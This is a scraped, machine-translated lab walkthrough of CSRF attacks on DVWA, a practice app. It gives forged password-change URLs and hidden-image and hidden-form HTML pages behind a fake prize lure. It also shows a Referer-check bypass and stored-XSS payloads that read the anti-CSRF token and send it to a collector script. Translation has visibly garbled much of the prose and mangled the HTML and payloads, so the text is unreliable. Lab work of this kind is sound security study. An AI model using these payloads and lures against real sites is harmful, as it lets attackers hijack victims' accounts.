[DVWA (g)] CSRF CSRF

Others 2019-06-27 01:10:55 views: null

CSRF CSRF (Cross Site Request Forgery)

Preface:

CSRF is using the user's cookie, false to do some things that are harmful to the user, CSRF the most critical is the use of the victim's cookie send fake requests to the server

low:

1. Observation:

Enter the new password, the old password, change. Tip password changes, you can check with hackbar load URL


Found just change link

2. construct URL:

http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#

When will use their existing cookie, is false to modify password operation after the victim you click on the link, password changes for the password

3. Hide short link:

But there are many problems, too low-level tools will lead to the victim's suspicion, so use some means to hide.
Obviously, there is a problem link, naked written password! Fool did not dare to point links, and on the use Webmaster Tools converted into short links .

4. Show hidden:

Now the points go, but go after, come back to change the password interface, but also to display the password changed successfully! This will arouse suspicion, to see that change your password, so go further, let himself into the point, and then willingly and was not aware of the change the password.
Html file structure on your server (this is www folder):

click.html:

<! DOCTYPE HTML > 
< HTML > 
< head > 
    < title > lottery </ title > 
</ head > 
< body > 
    < the p- > 
        < A href = "change_password.html" > click on the link, extracts a million prize! </ A > 
    </ P > 
</ body > 
</ HTML >

effect:

change_password.html:

<! DOCTYPE HTML > 
< HTML > 
< head > 
    < title > winning friends </ title > 
</ head > 
< body > 
    < IMG the src = "http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=password&password_conf & Change = Change password = # " style =" Run the display: none; " /> 
    < h1 > your winning friends </ h1 > 
    < h2 > in the Change password Awards </ h2 > 
</body>
</html>

effect:

At this password has been changed!

Of course, this is just write a simple web page, but the average user can not see changes even feel right, also I did not know what happened, in fact, entirely possible to attack disguised as a website associated with a high degree of site link, to achieve the purpose maliciously modified.

medium:

1. Directly edit the URL in the hackbar:

Not found, and the popup prompt
HTTP_REFERER in question

2. Check the php source code:

We found, including judgments sources

    // Checks to see where the request came from
    if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false )

That must include the host name, here is 127.0.0.1, the change_password.html renamed 127.0.0.1.html, the problem is solved.

high:

1. Try:

To continue with the original, we found to be invalid.

Experiment once and then modify the code found after more than a token, but has been tested and is changing:

2. Check the php source code:

It found that anti-csrf way is to check token

    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

Simply get the token, the problem is solved.

3. Code scripting attacks:

By acquiring token, automatically change the password.

<!DOCTYPE html>
<html>
<head>
    <title></title>
</head>
<body>    
    <iframe src="http://127.0.0.1/dvwa/vulnerabilities/csrf" id="hack" border="0" style="display:none;"></iframe>
    <form method="GET" id="transfer" action="http://127.0.0.1/dvwa/vulnerabilities/csrf">
        <input type="hidden" name="password_new" value="password">
        <input type="hidden" name="password_conf" value="password">
        <input type="hidden" name="user_token" value="">
        <input type="hidden" name="Change" value="Change">
    </form>
    <script type="text/javascript">
        function attack()
        {
            document.getElementsByName('user_token')[0].value=document.getElementById("hack").contentWindow.document.getElementsByName('user_token')[0].value;
            document.getElementById("transfer").submit();
        }
    </ Script > 
    < h1 > Your winning friends </ h1 > 
    < h2 > in the Change Password Awards </ h2 > 
</ body > 
</ HTML >

At this time he found the running, but then quit DVWA login and password can not be modified.

4. Find a reason:

Cross-domain issue, the attack is 10.4.253.2, I was 127.0.0.1, can not be achieved, but be allowed to take the initiative to send a token of our domain 127.0.0.1, before Lenovo xss attack, you can take advantage of high rank! So now uses XSS attack stored there, using the memory type, the attack code deposited into the server, not repeat them here, do not understand can see in front of XSS storage type cross-site attacks essays ---- high section

The first payload structure to see whether feasible

name:<iframe src="../csrf" onload=alert(frames[0].document.getElementsByName('user_token')[0].value)>

message:change password

Pop random token, feasible

6. use token

Here began frantically tried, because the database length limit, can not be changed from the front-end code html, so the code is not feasible long, trouble!
The current thinking, but there is a database payload length limit! :
Build php file handle passed in token
get_dvwa_token.php:

come xss stored, modify the name length limit, constructed payload:
name: <iframes. Document.location the onload = = 'HTTP: //127.0.0.1/get_dvwa_token.php user_token? = '+ Frames [0] .document.getElementsByName (' user_token ') [0] .Value>
Message: Change password

there is a pit, not yet mastered the art, persistence, and the like discussed later.
Anyway, need, to get to be the token use! This step is not resolved, the final camouflage method is to click on the link to jump back xss storage-type attack, the last display cover-up.

impossible:

PDO using SQL injection defense technology;

As protective CSRF, it requires the user to enter the old password (brute);

So without knowing the original password, in any case can not be CSRF attacks.

postscript

Thinking together Skynet security issues:

1) If you find a CSRF how do you use?

The key one: that trick users into clicking, there will be an opportunity after the user clicks;

Second key: impostor, hot, taking advantage of the user logged in, the user name of sabotage or information gathering;

2) CSRF and XSS What is the connection?

csrf often use XSS attacks

Guess you like

Origin www.cnblogs.com/wayne-tao/p/11094012.html
Recommended
Ranking
#2019110700005
What materials and procedures are required for patent transfer
What is the blockchain Ethereum triplet state root transaction root receipt root
Front-end study notes 04 --- About the insertion of html pictures and videos
Documents required for the filing of WeChat Mini Programs in special industries, the filing process of WeChat Mini Programs in special industries, how to file WeChat Mini Programs in special industries
2017 Qingdao-site tournament I The Squared Mosquito Coil
[BZOJ3165][HEOI2013]Segment (line segment tree without marking)
Kettle series: KettleEasyExpand, an open source Kettle universal plugin by Ma Jinju
The latest tutorial on making framework for iOS
DAX Section 6: Statistical Functions
Daily
More
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)

Code World

© 2018 codetd.com